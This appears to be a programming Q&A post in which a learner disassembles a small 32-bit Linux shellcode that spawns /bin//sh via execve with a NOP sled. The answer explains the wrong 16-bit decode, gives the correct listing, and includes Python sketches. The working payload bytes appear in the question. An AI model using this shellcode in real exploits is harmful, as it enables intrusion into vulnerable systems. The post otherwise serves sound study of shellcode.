I am learning about shellcode.
I have found this shellcode in a tutorial:
python -c 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 "' > shellcode
I want to disassemble this very basic shellcode in order to understand how it works.
Here is what I did:
$ objdump -D -b binary -m i8086 shellcode
shellcode: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 90 nop
1: 90 nop
2: 90 nop
3: 90 nop
4: 90 nop
5: 90 nop
6: 90 nop
7: 90 nop
8: 90 nop
9: 31 c0 xor %ax,%ax
b: 50 push %ax
c: 68 2f 2f push $0x2f2f
f: 73 68 jae 0x79
11: 68 2f 62 push $0x622f
14: 69 6e 89 e3 50 imul $0x50e3,-0x77(%bp),%bp
19: 53 push %bx
1a: 89 e1 mov %sp,%cx
1c: b0 0b mov $0xb,%al
1e: cd 80 int $0x80
Or:
$ ndisasm shellcode
00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 90 nop
00000009 31C0 xor ax,ax
0000000B 50 push ax
0000000C 682F2F push word 0x2f2f
0000000F 7368 jnc 0x79
00000011 682F62 push word 0x622f
00000014 696E89E350 imul bp,[bp-0x77],word 0x50e3
00000019 53 push bx
0000001A 89E1 mov cx,sp
0000001C B00B mov al,0xb
0000001E CD80 int 0x80
This shellcode contains strings, which are being decoded as x86 instructions. Is there a way to put proper labels on jumps?
And is there a way to display the strings as text instead of decoding them as x86 instructions? I know this is not easy, because there is no ELF file with sections and headers.
If you had shellcode which used call or jmp to jump over some data, you'd have to replace the strings with NOPs if the disassembler got out of sync while treating the data as instructions, as @DavidJ suggested.
In this case, you're just disassembling in the wrong mode. The jnc is clearly bogus (as I think you realized).
The disassembler is treating the push opcode (the 0x68 byte) as the start of push imm16, because that's how 16-bit mode works. But in 32 and 64-bit modes, the same opcode is the start of a push imm32. So the push instruction is actually 5 bytes instead of 3, and the next instruction is actually the next push.
The bogus short jnc is a huge hint that this is not 16-bit code.
Use ndisasm -b32 or -b64. Ndisasm can read input from stdin, so I used python2 -c 'print "... "' | ndisasm - -b32.
When using objdump, if you prefer Intel syntax, use objdump -d -Mintel. So you could run objdump -Mintel -bbinary -D -mi386 /tmp/shellcode for 32-bit (-mi386 selects x86 as the architecture (rather than ARM or MIPS or whatever), and implies -Mi386 32-bit mode as well).
Or for 64-bit, objdump -D -b binary -mi386 -Mx86-64 /tmp/shellcode works. (objdump won't read the binary from stdin :/) Check the objdump man page for more about -M options.
I use this alias in my ~/.bashrc: alias disas='objdump -drwC -Mintel', because I normally disassemble ELF executables / objects to see what a compiler did, not shellcode. You might want -D in your alias.
I'm pretty sure this is 32-bit code, because in 64-bit mode the two pushes would leave a gap. There is no push imm64, but push imm32 is a 64-bit push with the immediate sign-extended to 64 bits. In 64-bit mode, you would need a different instruction sequence to end up with rsp pointing to "abcdefgh".
Also, the use of int 0x80 with a stack address is a big clue this is not 64-bit code. int 0x80 works on Linux in 64-bit mode, but it truncates all inputs to 32-bit: see "What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?"
The 32-bit disassembly from ndisasm is:
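00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 90 nop
00000009 31C0 xor eax,eax
0000000B 50 push eax
0000000C 682F2F7368 push dword 0x68732f2f
00000011 682F62696E push dword 0x6e69622f
00000016 89E3 mov ebx,esp
00000018 50 push eax
00000019 53 push ebx
0000001A 89E1 mov ecx,esp
0000001C B00B mov al,0xb
0000001E CD80 int 0x80
Which looks sane. It contains no branches.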
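To see where the strings went, here is a minimal Python sketch (not part of the original answer) that replays only the two push imm32 instructions from the shellcode bytes and shows what they leave on the stack. The helper name stack_after_pushes is made up for illustration. It models nothing but opcode 0x68, and it assumes the immediate is sign-extended to the push width, as described above.

```python
import struct

# The two push instructions from the shellcode (opcode 0x68 + 4-byte immediate).
PUSHES = bytes.fromhex("682f2f7368" "682f62696e")


def stack_after_pushes(code, width):
    """Replay consecutive push imm32 instructions (hypothetical helper).

    width is the push size in bytes: 4 in 32-bit mode, 8 in 64-bit mode.
    Returns the stack memory, lowest address (where the stack pointer
    ends up) first.
    """
    stack = b""
    pos = 0
    while pos < len(code):
        if code[pos] != 0x68:
            raise ValueError("this sketch only understands push imm32 (0x68)")
        # Read the signed 32-bit little-endian immediate after the opcode.
        (imm,) = struct.unpack_from("<i", code, pos + 1)
        # Sign-extend to the push width and store it little-endian.
        value = imm.to_bytes(width, "little", signed=True)
        # The stack grows downward, so newer data sits at lower addresses.
        stack = value + stack
        pos += 5
    return stack


print(stack_after_pushes(PUSHES, 4))  # 32-bit mode
print(stack_after_pushes(PUSHES, 8))  # 64-bit mode
```

With 4-byte pushes the two immediates sit back to back and spell /bin//sh, terminated by the zero from the earlier push eax. With 8-byte pushes, zero bytes land between /bin and //sh, which is the gap mentioned above.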
To answer the question about labels on jumps: yes, Agner Fog's objconv disassembler can put labels on branch targets to help you figure out which branch goes where. See "How do I disassemble raw x86 code?"
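As a rough illustration of the arithmetic behind labelling a branch target (this is not how objconv is implemented), a short jump is two bytes: an opcode (0x70 to 0x7f for conditional jumps, 0xeb for jmp short) followed by a signed 8-bit displacement. The target is the address of the next instruction plus that displacement. The function name short_jump_target is hypothetical, and the sketch ignores 16-bit address wraparound.

```python
def short_jump_target(code, offset):
    """Return the target offset of the short jump located at `offset`.

    Handles only short Jcc (0x70..0x7f) and jmp short (0xeb).
    """
    opcode = code[offset]
    if not (0x70 <= opcode <= 0x7F or opcode == 0xEB):
        raise ValueError("not a short jump opcode")
    # The displacement is a signed byte, relative to the next instruction.
    rel8 = int.from_bytes(code[offset + 1:offset + 2], "little", signed=True)
    return offset + 2 + rel8


shellcode = bytes.fromhex(
    "909090909090909090"          # nine NOPs
    "31c050682f2f7368682f62696e"  # xor, push, push imm32, push imm32
    "89e3505389e1b00bcd80"        # mov, push, push, mov, mov, int 0x80
)

# The bogus "jnc" that the 16-bit disassembly found at offset 0xf (bytes 73 68).
print(hex(short_jump_target(shellcode, 0x0F)))
```

This prints 0x79, matching the jnc 0x79 in the 16-bit listings. That target lies well past the end of the 32-byte buffer, which is another sign that the 16-bit decode was wrong.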